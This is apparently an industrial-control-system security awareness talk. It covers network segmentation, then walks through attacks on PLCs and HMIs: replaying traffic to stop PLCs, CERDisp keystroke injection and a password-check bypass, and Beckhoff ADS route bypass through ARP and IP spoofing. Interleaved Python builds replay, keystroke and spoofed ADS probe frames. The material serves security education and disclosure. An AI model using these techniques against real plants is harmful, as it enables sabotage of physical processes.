
INDUSTRIAL CONTROL & COMMUNICATION COMPETENCE CENTER | HOWEST – UGENT

October 15th, 2019

ARTIFICIAL INTELLIGENCE - BLOCKCHAIN - CYBER SECURITY
EDUCATION - RESEARCH - CONSULTING

IC4 Awareness Session

Ing. Tijl Deneut, Ing. Tinus Umans


Who am I? Tijl Deneut

▪ Lecturer at Howest University College
  • Bruges / Brugge: Applied Computer Science (Toegepaste Informatica), Cyber Crime Professional track

▪ Researcher at Howest & Ghent University
  • Currently: Industrial Security

▪ Certificates (among others)
  • VMware Certified Professional & IT Academy Instructor
  • Cisco Certified Instructor for CCNA1-4 & CCNA Security
  • IBM Certified Business Common Associate & Professional on business continuity
  • EC-Council Certified Ethical Hacker (CEH/Practical) plus Instructor (CEI)

▪ [email protected]
▪ www.linkedin.com/in/tijldeneut


What are "Industrial Control Systems"?

"An ICS is a broad class of command and control networks and systems that are used to support all types of industrial processes."

They include a variety of system types, including:
• Supervisory Control And Data Acquisition (SCADA) systems
• Distributed Control Systems (DCS)
• Process Control Systems (PCS)
• Safety Instrumented Systems (SIS)
• smaller control system configurations such as Programmable Logic Controllers (PLCs)

The term "OT" is actually never used on the factory floor. It is only used by IT people to distinguish themselves …


Where can I find ICS systems?

[Slide collage: Nuclear, Oil & Gas, Transportation, Water, HVAC, Building Automation, Manufacturing, Process Industry, Petrochemical, Food Industry, Discrete Manufacturing, Green Energy, Water Locks, Dams, Stand-alone Machines, Generators, Pharmaceutical]


What does that look like?

[Diagram: Office network, Supervision network and Production network side by side; the last two make up the Industrial Control Systems]

What's inside?

[Diagram, same three zones:
  Office: ERP server, Production management systems, Corporate IT, WAN
  Supervision network: Supervision consoles, Engineering stations, SCADA servers, Historians / Logging server
  Production network: PLCs, HMIs, Drives, Industrial networks, Sensors, Robots]


Within our project, a lot of ICS factories and companies asked for our help. These are the lessons we've learned from real companies, real cases…

TOPIC FOR TODAY:

Lessons Learned From Troubleshooting REAL companies

Lessons learned will be demonstrated on:

Introducing our Fake Company: FicTile ("We fake your tiles")

Management of Security Vulnerabilities in Industrial Networks


Enable Remote Monitoring of Industrial Equipment

[Network diagram: the office / datacenter (10.20.0.0 /16) is wired to three production halls, Presses (10.20.1.0 /16), Furnace (10.20.2.0 /16) and Dosing equipment (10.20.3.0 /16), each hall holding a few PLCs and an HMI]


In Real Life, three major kinds of "problems":

1. Non-human, accidental issues
   • And how FicTile "solved" it
2. Human on the job, accidental issues
   • And how FicTile "solved" it
3. Human recreational, accidental issues
   • And how FicTile "solved" it


Scenario 1

Please help: "PLC of dosing equipment goes into stop mode every day at 4 AM"
(Tijl Deneut, IT Manager)


[Same network diagram; annotation on the Dosing equipment hall: "TCP broadcasts, big TCP window"]

PLC continuously goes into stop mode.

"Solution": a new switch that filters out these types of broadcasts.


Scenario 2

Please help: "Dosing equipment mysteriously goes into error and can not be restarted"
(Tijl Deneut, IT Manager)


[Same network diagram; annotation: a PLC program meant for PRES-1 in the Presses hall is downloaded to a PLC in the wrong hall (Dosing equipment)]

Dosing equipment mysteriously goes into error.

"Solution": organize an OT training to create awareness for PLC programmers.


Scenario 3

Please help: "USB stick causes a complete shutdown of production"
(Tijl Deneut, IT Manager)


[Same network diagram; annotation on the office / datacenter: antivirus installation]

Thumb drive causes a shutdown of production.

"Solution": install a new and expensive antivirus program on the laptop.


The Real Problem?

The so-called "flat" network:
o One "broadcast" domain
o The differences in IP addresses are only on paper: 10.20.1.0 /16, 10.20.2.0 /16 and 10.20.3.0 /16 all carry the same /16 mask, so together with the office they form one network, 10.20.0.0 /16
o Each piece of equipment has a direct connection with any other device
o No opportunity for segmentation in zones or areas
o No control on network traffic

An untrusted network!

- Not safe: bad configurations or errors have an influence on the whole network
- Not secure: illegitimate access is not manageable


Some Manufacturers' Guidelines


The (starting) solution?

Solution: network segmentation

Option 1: Apply routers in front of each hall or even each piece of equipment
- Configure traffic control on each router
- Broadcast traffic stops at the router
- Fairly expensive, depending on the network size (in particular industrial routers)
- Additional wiring, depending on the current infrastructure
- In case of migration, each piece of equipment needs to be changed separately


Adding Routers

[Before: the flat diagram, office / datacenter 10.20.0.0 /16 and halls 10.20.1.0 /16, 10.20.2.0 /16, 10.20.3.0 /16]

[After: a router in front of each hall; Presses becomes 192.168.1.0 /24 (hosts 192.168.1.X, 192.168.1.Y), Furnace 192.168.2.0 /24 (192.168.2.X, .Y, .Z) and Dosing equipment 192.168.3.0 /24 (192.168.3.X, .Y, .Z); the office / datacenter stays 10.20.0.0 /16]


The (starting) solution?

Solution: network segmentation

Option 2: Use of VLANs (logical subdivision of a switch)
- Configure traffic control in one location
- Broadcast traffic is limited to the VLAN
- Switches have to support this (managed switches)
- Needs to be thought through in advance; if necessary change the subnet mask
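The "differences in IP addresses are only on paper" remark on the Real Problem slide, and the effect of the router (option 1) and VLAN (option 2) redesigns, can be checked mechanically before anyone touches a switch. The block below is an added example, not from the IC4 slides: it uses Python's ipaddress module to group hosts into broadcast domains and to tell, from each side's own mask, whether two hosts talk to each other directly (same network, so ARP and broadcasts reach) or have to go through a gateway where a filter can sit. The host lists are constructed for the example from the FicTile plans on the slides.

```python
from collections import defaultdict
from ipaddress import ip_interface


def broadcast_domains(hosts):
    """Group interface strings ('10.20.1.10/16') by the network they really
    belong to. Every host in one group shares one broadcast address, so a
    broadcast (or a misconfigured device) reaches all of them."""
    groups = defaultdict(list)
    for host in hosts:
        iface = ip_interface(host)
        groups[iface.network].append(str(iface.ip))
    return {str(net): sorted(members) for net, members in groups.items()}


def talks_directly(a, b):
    """True when host a believes host b is on its own link: it will ARP for b
    and send frames straight to it, with no router in between and therefore
    no place for an ACL. Judged from a's mask only, so a mismatch in masks
    (the 'change the subnet mask' caveat of option 2) shows up as a one-way
    answer."""
    ia, ib = ip_interface(a), ip_interface(b)
    return ib.ip in ia.network


def segmentation_report(hosts):
    """How many broadcast domains a plan has and how many hosts the largest
    one holds; the flat plan has exactly one domain with everything in it."""
    domains = broadcast_domains(hosts)
    return {"domains": len(domains),
            "largest": max(len(members) for members in domains.values())}


# Constructed: FicTile's flat plan. The slide's 10.20.1.0/16, 10.20.2.0/16 and
# 10.20.3.0/16 all carry mask /16, so they are the same network as the office.
FLAT = ["10.20.0.10/16",                     # office / datacenter
        "10.20.1.10/16", "10.20.1.11/16",    # presses
        "10.20.2.10/16",                     # furnace
        "10.20.3.10/16", "10.20.3.11/16"]    # dosing equipment

# Constructed: the plan from the "Adding Routers" slide, one /24 per hall.
ROUTED = ["10.20.0.10/16",
          "192.168.1.10/24", "192.168.1.11/24",
          "192.168.2.10/24",
          "192.168.3.10/24", "192.168.3.11/24"]

if __name__ == "__main__":
    for name, plan in (("flat", FLAT), ("routed", ROUTED)):
        print(name, segmentation_report(plan), broadcast_domains(plan))
    print(talks_directly("10.20.1.10/16", "10.20.3.11/16"))      # presses -> dosing, no router
    print(talks_directly("192.168.1.10/24", "192.168.3.11/24"))  # must go via a gateway
```

Run it on the real address plan (exported from the engineering tool or an ARP sweep) rather than on the constructed lists; a report with one domain and every host in it is the flat network of the scenarios above, whatever the third octet says.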


Configuring VLANs

[Before: the flat diagram, office / datacenter 10.20.0.0 /16 and halls 10.20.1.0 /16, 10.20.2.0 /16, 10.20.3.0 /16]

Configuring VLANs, option A (requires extensive config)
[Diagram: Presses in VLAN ID 1000 (10.20.1.0 /16), Furnace in VLAN ID 2000 (10.20.2.0 /16), Dosing equipment in VLAN ID 3000 (10.20.3.0 /16); one TRUNK link carries VLAN 1000, 2000 and 3000 to the office / datacenter (10.20.0.0 /16)]

Configuring VLANs, option B (requires extra cables)
[Diagram: the same VLAN IDs per hall; the difference with option A is in the cabling rather than in the switch configuration]


The other upside: Real Life Statistics

We assisted some companies making this migration, and we have some PRE and POST statistics.

Very common in *all* of these companies: redundant traffic


Hacker damage …

And am I safe then? Safer, but not secure!
(Tijl Deneut, IT Manager)


Why ICS security now? Several migrations have happened over time:

• ±15 years ago: all systems still used fieldbus protocols
  • There was a movement to Ethernet based protocols
• ±10 years ago: networking became abundant, everything started to become interconnected
  • Engineers / operators / managers connecting to their production devices from everywhere in the company
• ±5 years ago: the age of IoT, Big Data and Industry 4.0
  • Engineers / operators / managers want to monitor, manage and connect to their production devices from home

And all this using protocols that were developed 40+ years ago and have zero support for security, authentication, encryption …

Demo: Modbus on Android


Remote access over internet to ICS networks

[Screenshots: World of VNC; public websites]


Let's get into the Hacker Mindset

What does a hacker have at his disposal? The internet!
• Explore the possibilities: https://www.shodan.io/explore
• Free reports: https://www.shodan.io/report/YV9DdaM0 and https://www.shodan.io/report/3HyjE1Lu
• Also for industrial systems: icsmap and radar, or the general map


Let's get into the Hacker Mindset

[Screenshots: February 2017 vs June 2019]


Management of Security Vulnerabilities in Industrial Networks

"Hackers on our network": what can they do?
(Tijl Deneut, IT Manager)


Let's get into the Hacker Mindset

Industrial networks have some serious security drawbacks:
• Open and insecure protocols
• The only supported software is outdated
• Long life expectancy and (lack of) updates
• Slow or non-existent handling of security issues
• Hard to get hardware, so not well researched … ("security by obscurity" has a new meaning)

Let's take a look at some issues that describe these drawbacks.


Protocols, protocols, protocols ☺

Industrial devices rely on old and insecure protocols.

So we did some research to investigate these protocols …

- Phoenix Contact: completely proprietary, not even Wireshark has any idea what we are dealing with


Research? How?
• Downloading the original software
  • Usually demo versions, freely downloadable
• Connecting to the PLC
  • Usually more or less just entering the IP address
  • Or sometimes not even that
• Start Wireshark
• Click "Stop", click "Reset", click "Cold"
• Replay captured traffic using Python
• Done …

Demo: Stop & Start Phoenix Contact
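The last two steps of that procedure (capture in Wireshark, replay with Python) are what the demo does. The block below is an added example, not the IC4 demo script, and it knows nothing about the Phoenix Contact protocol: it parses a constructed capture (client and PLC records as hex streams, the form Wireshark's "Copy as Hex Stream" produces), replays the client side over a transport you inject, and compares every reply with the captured one. That comparison is the practitioner's check: a replay that gets a different answer (a session id, a sequence number, a challenge) is the first sign that the protocol is less stateless than the click sequence suggests. The SESSION bytes and the fake_plc stub are constructed for this example.

```python
import re
import socket


def hexstream_to_bytes(text):
    """Accept Wireshark 'Copy as Hex Stream' output (contiguous hex) as well
    as dumps with spaces, colons or 0x prefixes; non-hex characters are dropped."""
    digits = re.sub(r"[^0-9a-fA-F]", "", text.replace("0x", ""))
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits)


def parse_session(text):
    """Constructed capture format for this example: one record per line,
    'C <hex>' for workstation -> PLC, 'S <hex>' for PLC -> workstation,
    '#' starts a comment. Returns [(direction, bytes), ...] in capture order."""
    steps = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        direction, _, payload = line.partition(" ")
        if direction not in ("C", "S"):
            raise ValueError(f"bad direction in line: {raw!r}")
        steps.append((direction, hexstream_to_bytes(payload)))
    return steps


def replay(steps, send, recv):
    """Send every client record and check the device's answer against the
    captured reply. send(data) and recv(n) are injected, so the same logic
    runs against a real socket or a stub. Returns (step_index, matched, got)
    per server record and stops at the first mismatch: everything captured
    after that point belongs to a state the device is no longer in."""
    results = []
    for index, (direction, payload) in enumerate(steps):
        if direction == "C":
            send(payload)
            continue
        got = recv(len(payload))
        matched = got == payload
        results.append((index, matched, got))
        if not matched:
            break
    return results


def tcp_transport(host, port, timeout=3.0):
    """Real transport: (send, recv, close) over one TCP connection."""
    sock = socket.create_connection((host, port), timeout=timeout)

    def recv(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                break
            buf += chunk
        return buf

    return sock.sendall, recv, sock.close


def fake_plc(replies):
    """Offline stand-in for a device: answers each request from a table of
    request bytes -> reply bytes; unknown requests get a single 0xff byte."""
    pending = []

    def send(data):
        pending.append(replies.get(data, b"\xff"))

    def recv(n):
        return pending.pop(0)[:n] if pending else b""

    return send, recv


# Constructed session (not a real PLC protocol): hello, stop, start.
SESSION = """
# direction  hex stream
C 01 00 0a                 # hello
S 01 00 0a 00              # hello ack
C 02 00 01                 # stop
S 02 00 01 00              # stop ack
C 02 00 02                 # start
S 02 00 02 00              # start ack
"""

if __name__ == "__main__":
    steps = parse_session(SESSION)
    device = fake_plc({b"\x01\x00\x0a": b"\x01\x00\x0a\x00",
                       b"\x02\x00\x01": b"\x02\x00\x01\x00",
                       b"\x02\x00\x02": b"\x02\x00\x02\x00"})
    print(replay(steps, *device))
```

Against a real device use `send, recv, close = tcp_transport(host, port)` and `replay(steps, send, recv)`; the stub is only there so the comparison logic can be exercised without a PLC on the bench.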


Discovery?
➢ Many ICS vendors (including Schneider, Beckhoff, Siemens …) use a custom discovery implementation
➢ So always use the technology as provided by the manufacturer
  - It is a proven system which always works ☺
  - These tools exist for about every OEM
➢ An example: the Siemens Primary Setup Tool (or Proneta or TIA Portal)
  - It scans the network for Siemens devices
  - And uses a pretty simple protocol to do so: the Profinet Discovery Protocol (DCP)
➢ As it seems, there is somewhat of an issue with the Profinet Discovery Protocol
  - We did some research …

Demo: FullSiemensScan.py


An example: Mitsubishi Protocol Analysis

[Screenshots: Programming a Mitsubishi PLC; Scanning for Mitsubishi PLCs]


Broadcasts? But why?

Many protocols have been created with the ease of the engineers in mind:

• Sending all packets to 255.255.255.255 / FF:FF:FF:FF:FF:FF is easy to use because the workstation and the PLC do not have to be in the same subnet to be able to communicate with each other
  • So this protocol works "Out-Of-The-Box"
  • So there is no need to have a valid IP address on your computer, easy right?
• Unfortunately this also means that all traffic is being delivered to every other device in the network
  • Problem anyone?
• Please note: once the workstation and PLC are in the same subnet, TCP is used and a more "regular" way of communicating occurs


Normal protocol


Creating scripts

Conclusion: access to the network is game over for these PLCs.

Demo: MitsubishiScan & MitsubishiSetState


The issue?
➢ As often: user friendliness is the big enemy of security
➢ If it is easy to use for the Operator/Engineer, then it is easy to use for hackers
➢ As an example, let's look at our GitHub page (https://github.com/tijldeneut)


Mitsubishi PLC Software is called “GX Works”


Other general issue: limited OS support


An example of outdated software: "Windows CE"

Windows Compact Embedded
• WinCE 4.0: 2002/01
• WinCE 5.0: 2004/08
• WinCE 6.0: 2006/06
• WinCE 7.0: 2011/03

Has been retired in 2013.

Microsoft says "do not use"!


Windows CE, example: From zero to Remote Code Execution in less than 10 minutes
A reverse engineering example …

Protocol of choice? Microsoft Compact Embedded Remote Display (CERDisp)


So what is this protocol?

The CERDisp protocol is used to take over the display of any Windows CE device that is running this service.
→ An example in ICS would be certain Beckhoff PLCs.

From the manual (https://infosys.beckhoff.com/english.php?content=../content/1033/cx9000_hw/html/cx9000_updateimage.htm)


Let’s begin… Capturing some data

- Starting a normal session, logging in, seeing desktop …


Analyzing the protocol

- Let's look in detail at some packets. That's a "banner grab" ☺


Analyzing the protocol
- Next packet … We can make a brute forcer ☺


Analyzing the protocol
- Last piece: getting keys

Key sequence == Windows, arrow up, arrow up, enter, T, e, s, t, enter

00015b0001015b000001260001012600000126000101260000010d0001010d000001100000015400010154000101100000014500010145000001530001015300000154000101540000010d0001010d00

Split per key (each 4-byte record is one key down or one key up):
00015b00 01015b00   Windows key
00012600 01012600   arrow up
00012600 01012600   arrow up
00010d00 01010d00   enter
00011000            shift (down)
00015400 01015400   T
01011000            shift (up)
00014500 01014500   e
00015300 01015300   s
00015400 01015400   t
00010d00 01010d00   enter


Analyzing the protocol
- Last piece: identifying keys

After some "research" (or in other words, trial and error), we made these conclusions:
• 0001+keycode+00 == key down
• 0101+keycode+00 == key up
• (Good) response from server is always '03000000'

Where:
• 5b == Winkey
• 10 == shift
• 25 == arrleft, 26 == arrup, 27 == arrright, 28 == arrdown
• 12 == space
• 0d == enter
• 62 == 1, 63 == 2, 64 == 3, 65 == 4, …, 69 == 9, 6a == 0
• 41 == a, 42 == b, 43 == c, 44 == d …
→ There seems to be some pattern here: the values line up with the Windows virtual-key (VK_*) codes (VK_LWIN = 0x5B, VK_SHIFT = 0x10, VK_LEFT..VK_DOWN = 0x25..0x28, VK_RETURN = 0x0D, 'A'..'Z' = 0x41..0x5A), so check any further key against that table rather than guessing it.
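The record format and the key table above are enough to build a keystroke encoder and decoder. The block below is an added example, not the IC4 CERDisplay-ResetDevice.py script: it encodes a key sequence into the 4-byte records described on the slides, decodes a captured stream back into named key events, and checks the result against the capture from the previous slide. It deliberately maps only the keys whose codes match the Windows VK table (Win, Shift, arrows, Enter, letters); digits and space are left out until their codes are verified. Transport and framing around the records are not on the slides and are not part of this example.

```python
# Added example: CERDisp keystroke records as described on the slides.
# 00 01 <code> 00 = key down, 01 01 <code> 00 = key up, good reply 03 00 00 00.
VK = {"win": 0x5B, "shift": 0x10, "left": 0x25, "up": 0x26, "right": 0x27,
      "down": 0x28, "enter": 0x0D}
NAME_OF = {code: name for name, code in VK.items()}
KEY_DOWN, KEY_UP = 0x00, 0x01
GOOD_RESPONSE = bytes.fromhex("03000000")   # reply the slide reports per record


def key_event(code, down=True):
    """One 4-byte record: flag (00 down / 01 up), 01, key code, 00."""
    return bytes([KEY_DOWN if down else KEY_UP, 0x01, code & 0xFF, 0x00])


def press(code):
    """Key down followed by key up."""
    return key_event(code, True) + key_event(code, False)


def encode_text(text):
    """Letters use the VK code of the upper-case letter (0x41..0x5A); an
    upper-case letter is wrapped in Shift down/up; a newline is Enter."""
    out = b""
    for ch in text:
        if ch == "\n":
            out += press(VK["enter"])
        elif ch.isascii() and ch.isalpha():
            code = ord(ch.upper())
            if ch.isupper():
                out += key_event(VK["shift"], True) + press(code) + key_event(VK["shift"], False)
            else:
                out += press(code)
        else:
            raise ValueError(f"no verified key code for {ch!r} in this example")
    return out


def encode_sequence(steps):
    """steps: VK names ('win', 'up', 'enter', ...) or text strings, in order."""
    return b"".join(press(VK[s]) if s in VK else encode_text(s) for s in steps)


def decode_events(data):
    """Parse a record stream into ('down'|'up', code) tuples. A record that does
    not have the 00/01 01 xx 00 shape is rejected rather than guessed at."""
    if len(data) % 4:
        raise ValueError("stream is not a whole number of 4-byte records")
    events = []
    for off in range(0, len(data), 4):
        flag, one, code, zero = data[off:off + 4]
        if one != 0x01 or zero != 0x00 or flag not in (KEY_DOWN, KEY_UP):
            raise ValueError(f"unexpected record at offset {off}: {data[off:off + 4].hex()}")
        events.append(("down" if flag == KEY_DOWN else "up", code))
    return events


def describe(events):
    """Map codes back to names: table names, letters for 0x41..0x5A, else hex."""
    def name(code):
        if code in NAME_OF:
            return NAME_OF[code]
        return chr(code) if 0x41 <= code <= 0x5A else f"0x{code:02x}"
    return [(state, name(code)) for state, code in events]


def ok_response(reply):
    """True only for the exact 03000000 the slides report as a good answer."""
    return reply == GOOD_RESPONSE


# The capture from the slide: Windows, up, up, enter, T, e, s, t, enter
CAPTURE = bytes.fromhex(
    "00015b0001015b000001260001012600000126000101260000010d0001010d00"
    "0001100000015400010154000101100000014500010145000001530001015300"
    "000154000101540000010d0001010d00")

if __name__ == "__main__":
    print(encode_sequence(["win", "up", "up", "enter", "Test", "enter"]) == CAPTURE)
    for state, key in describe(decode_events(CAPTURE)):
        print(state, key)
```

The decoder refuses any record that does not fit the documented shape, so a capture from a different firmware that changes the framing fails loudly instead of producing a plausible but wrong key list.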


Let's send the keys to restart the device using a Python script

Demo: CERDisplay-ResetDevice.py


So what do we have now?

We can now scan, enumerate, brute force and sniff this protocol.

- However, during this investigation we discovered something very strange:
→ If we use the script to send a WRONG PASSWORD, we get a '000000' response, but the connection is not killed.
→ Turns out that the password verification is on the client side. So it is up to cerhost.exe to stop the connection in case the wrong password is given.
→ So we perform some IDA Pro / debugging fu


"Hacking CERDisp"

Demo: CERHost.exe


Vendor response to this issue


This OS is found not only in industrial environments:
• Old Automated Teller Machines (ATMs)
• Gas station kiosks and payment terminals
• Buses / public transport
• Barcode scanners in stores & shops
• Charging stations for electric cars
• …

CARS?


Finally: some examples of security-not-done-right


Siemens Vulnerabilities

Siemens is one of the best students in the class:
• They have a devoted ProductCERT (Cyber Emergency Response Team)
• Responds to our requests fairly quickly
• Fixes issues, and makes proper notes on their website
  • https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
  • https://cert-portal.siemens.com/productcert/pdf/ssa-884497.pdf → (thanks to Hendrik Derre)


Phoenix Contact HMI

In cooperation with Lars De Maesschalck, Michael De Vos and Robbe Vuylsteke


The WebVisit software

→ Works by creating a Java applet that runs on a web server on the PLC.
→ This applet can read and write certain tags from the PLC program to operate the PLC.
→ It can then be opened and run in a browser (e.g. on an HMI device).

- Until 2014 this software was not secure and every single visitor of the website was able to interact with the Java applet
- However: in 2014, a version was created with a password implementation
- A total of four passwords can be configured to provide access to the applet
- And in 2017, the most recent version of this software no longer stores clear text passwords …


Demo Overview

- Accessing the HMI without passwords: https://photubias.stackstorage.com/s/G9EEzOeNvI5QeEW
- Performing an Unauthenticated Password Retrieval on a newer version: https://photubias.stackstorage.com/s/2vta8JPq0c6zMtF
- Performing a Hash Retrieval plus crack: https://photubias.stackstorage.com/s/CboS1iynnX6YVFD
- And finally: ignoring the entire login screen altogether: https://photubias.stackstorage.com/s/CHrrdrsNvkuzwor


TwinCAT ADS vulnerabilities: CVE-2019-16871

Ing. Tinus Umans


Who am I? Tinus Umans

▪ Engineer Industrial Automation
▪ Researcher at Ghent University campus Kortrijk
  • Industrial Security
  • Vision & RFID applications

▪ [email protected]
▪ www.linkedin.com/in/Tinus-Umans


More Money, More Security?

• "But security also comes with a price"
• CX9xxx
  • Windows CE
  • Cheaper
  • Not secure at all
• CX5xxx
  • Windows 10 LTSC
  • More expensive
• Let's find out…


Beckhoff Basics
• Beckhoff uses Windows operating systems on their controllers
• Engineers use Microsoft Visual Studio as the default programming environment
• The only thing engineers have to do to start programming controllers is install the TwinCAT 3 eXtended Automation Engineering software
  • Free to download
  • www.beckhoff.com/twincat3
  • Latest version: 3.1.4024.0 (build date 2019-07-24)
• IEC 61131-3 standard: Ladder, Function Block Diagram, Structured Text, …


Protocol Communication

• TwinCAT AMS/ADS protocol
• AMS (Automation Message Specification)
  • AMS Address (AMS NetId): by default the IP address + ".1.1" (10.0.0.35.1.1)
  • AMS Port: depends on the function
• Data: ADS (Automation Device Specification)
  • Commands for the PLC (more later)


Routes

• A route is a combination of AMS Address & IP address
• Acts like a whitelist: only known routes can communicate
• Routes are added with Windows credentials


Device Discovery

Just like almost every industrial vendor, Beckhoff devices respond to certain discovery packets. This is a different protocol altogether (because routes do not exist yet at that point), so information disclosure is guaranteed …
→ UDP/48899

Adding Routes Remotely?
→ Is also done via AMS-over-UDP
→ Adding routes requires (any) local Windows credential: it can be sent in clear text or encrypted


Secure?

So as it turns out: the only security measure for ADS communication is the IP address that is in the list of routes …
→ So can we bypass a restriction that is based purely on the source IP address?

Solution: IP spoofing

By sending packets coming from different IP addresses we can "discover" the possible routes that are present.

Done in two parts:
1. ARP poison
2. ADS verification packet


1. ARP Poisoning?

Problem: if a response is triggered by a packet coming from a certain IP address, that response will be sent to the device that actually has that IP address (the target resolves it, e.g. by performing an ARP request for that address).

So we need to tell the target our MAC address for that specific IP address
-> This is called "ARP spoofing"


2. Sending a single ADS packet

This too has to be "spoofed", i.e. sent with a fake IP address as the source of the packet.
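The AMS address convention from the Protocol Communication slide and the "ADS verification packet" of step 2 can be made concrete without a device on the bench. The block below is an added example, not the IC4 script from the GitHub page: it derives the AMS NetId from an IP address, builds an ADS ReadState request (used here as the verification packet, an assumption of this example), parses the AMS/TCP header of any frame, decodes a ReadState reply, and prepares one probe frame per candidate source address for the route discovery the slides describe. The header layout, state flags, AMS port numbers and ADS state codes follow Beckhoff's public AMS/ADS specification as the author of this example recalls it, not these slides, so verify them against the vendor documentation or a capture before relying on them; TCP/48898 and UDP/48899 are the ports named on the slides. Sending the frames with a spoofed source (and the ARP poisoning that makes the reply come back) is not part of the block.

```python
import struct
from ipaddress import IPv4Address

# Ports named on the slides
ADS_TCP_PORT, ADS_UDP_PORT = 48898, 48899
# AMS ports, commands, flags and states as in Beckhoff's public AMS/ADS
# specification (assumption of this example; check against the vendor docs)
AMSPORT_SYSTEMSERVICE, AMSPORT_TC3_PLC1 = 10000, 851
CMD_READ_DEVICE_INFO, CMD_READ, CMD_WRITE, CMD_READ_STATE, CMD_WRITE_CONTROL = 1, 2, 3, 4, 5
FLAG_REQUEST, FLAG_RESPONSE = 0x0004, 0x0005
ADS_STATES = {0: "INVALID", 1: "IDLE", 2: "RESET", 3: "INIT", 4: "START", 5: "RUN",
              6: "STOP", 7: "SAVECFG", 8: "LOADCFG", 9: "POWERFAILURE", 10: "POWERGOOD",
              11: "ERROR", 12: "SHUTDOWN", 13: "SUSPEND", 14: "RESUME", 15: "CONFIG",
              16: "RECONFIG"}
AMS_HEADER = "<6sH6sHHHIII"   # target NetId/port, source NetId/port, cmd, flags, len, error, invoke id
AMS_TCP_HEADER = "<HI"        # reserved, length of AMS header + data (little endian)


def netid_from_ip(ip):
    """Default AMS NetId: the IPv4 address followed by '.1.1' (slide: 10.0.0.35.1.1)."""
    return IPv4Address(ip).packed + b"\x01\x01"


def netid_from_str(s):
    return bytes(int(x) for x in s.split("."))


def netid_str(netid):
    return ".".join(str(b) for b in netid)


def build_request(target_ip, source_ip, command, data=b"", target_port=AMSPORT_TC3_PLC1,
                  source_port=33000, invoke_id=1):
    """AMS/TCP frame for one ADS request from source_ip to target_ip."""
    ams = struct.pack(AMS_HEADER, netid_from_ip(target_ip), target_port,
                      netid_from_ip(source_ip), source_port, command, FLAG_REQUEST,
                      len(data), 0, invoke_id) + data
    return struct.pack(AMS_TCP_HEADER, 0, len(ams)) + ams


def parse_frame(frame):
    """Split an AMS/TCP frame into its fields; length fields are checked, not trusted."""
    reserved, length = struct.unpack_from(AMS_TCP_HEADER, frame, 0)
    if reserved != 0 or length != len(frame) - 6 or length < 32:
        raise ValueError("bad AMS/TCP header")
    (t_id, t_port, s_id, s_port, cmd, flags,
     dlen, err, inv) = struct.unpack_from(AMS_HEADER, frame, 6)
    data = frame[38:38 + dlen]
    if len(data) != dlen:
        raise ValueError("data length does not match frame")
    return {"target": netid_str(t_id), "target_port": t_port, "source": netid_str(s_id),
            "source_port": s_port, "command": cmd, "flags": flags, "error": err,
            "invoke_id": inv, "data": data}


def parse_readstate(frame):
    """Decode a ReadState response: result, ADS state, device state."""
    f = parse_frame(frame)
    if f["command"] != CMD_READ_STATE or f["flags"] != FLAG_RESPONSE:
        raise ValueError("not an ADS ReadState response")
    result, ads_state, dev_state = struct.unpack("<IHH", f["data"])
    return {"result": result, "ads_state": ADS_STATES.get(ads_state, f"0x{ads_state:04x}"),
            "device_state": dev_state, "invoke_id": f["invoke_id"]}


def build_readstate_response(request_frame, ads_state, device_state=0, result=0):
    """Constructed reply, the way a runtime answers a request from a known route
    (used here instead of a live device)."""
    req = parse_frame(request_frame)
    data = struct.pack("<IHH", result, ads_state, device_state)
    ams = struct.pack(AMS_HEADER, netid_from_str(req["source"]), req["source_port"],
                      netid_from_str(req["target"]), req["target_port"], req["command"],
                      FLAG_RESPONSE, len(data), 0, req["invoke_id"]) + data
    return struct.pack(AMS_TCP_HEADER, 0, len(ams)) + ams


def route_probe_frames(target_ip, candidate_ips):
    """One ReadState request per candidate source. In the attack on the slides each
    frame is sent with its candidate IP as source (after ARP-poisoning the target
    so the reply reaches the attacker); only candidates in the target's route
    list get an answer. Sending is deliberately not part of this example."""
    return {ip: build_request(target_ip, ip, CMD_READ_STATE, invoke_id=i + 1)
            for i, ip in enumerate(candidate_ips)}


if __name__ == "__main__":
    req = build_request("10.0.0.35", "10.0.0.50", CMD_READ_STATE)
    print(parse_frame(req))
    print(parse_readstate(build_readstate_response(req, 5)))
```

The invoke id is different per candidate so that replies can be matched to the spoofed source even when they arrive out of order; a reply whose source NetId is not the target's is worth logging on its own, because it means another device on the flat network is answering ADS on the target's behalf.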


DEMO


Beckhoff Spoofing

• Added a route WITHOUT authentication
• We are now essentially a different ADS device: an IPC, an engineering PC, an HMI …
• TwinCAT ADS is a language that is defined by function blocks, to perform actions on devices.
• Examples of those actions are:
  • Reading/writing PLC variables
  • Setting the controller state to Stop, Run or Config mode
  • Downloading the internal PLC project
  • (Re)programming the internal PLC project
  • And adding routes without any additional authentication
  • … And as it turns out: a lot more …


More ADS actions? There is a website for that: https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=

Want to go further? There is a website for that: https://infosys.beckhoff.com/english.php?content=../content/1033/tcplclib_tc2_utilities/9007199289758859.html&id=


A little bonus

We can use this to bypass a Kiosk System too

DEMO


Conclusion: Remote Code Execution vulnerability

The prerequisites for this attack:
• An engineering system (e.g. a laptop) used to program a Beckhoff device (IPC/HMI/…)
• Has the TwinCAT runtime installed
  • Which is a requirement when programming with Beckhoff
• Ports open in the firewall (UDP/48899 or TCP/48898)
  • Open by default & necessary to add remote routes
  → To add a route from an IPC to a workstation, the ports above must be open!! (for some reason)
  • No longer necessary once the remote routes are added
• At least one route configured
  • Which is required to communicate with remote devices

Scripts on our GitHub


Are there solutions?

• Use a virtual machine for running TwinCAT
• Configure the Windows firewall
• And the official response from the Beckhoff Product Security CERT:
  "Please refer to Advisory 2017-001"


Official Solution


Want to know more? Join our project

• Innovative Network Monitoring Systems
• Cyber Security Solutions for Industry 4.0
• Regulations within the industrial sector

Or find us at our booth (and join the ICS CTF) ☺


Want to know more?
• There is a 5-day course (5 weeks, 1 day/week) scheduled, starting November 14th
• Visit www.ic4.be for more information and free newsletter subscriptions
• Also follow our blog (www.ic4.be/blog) and vulnerability checklist (checklist.ic4.be)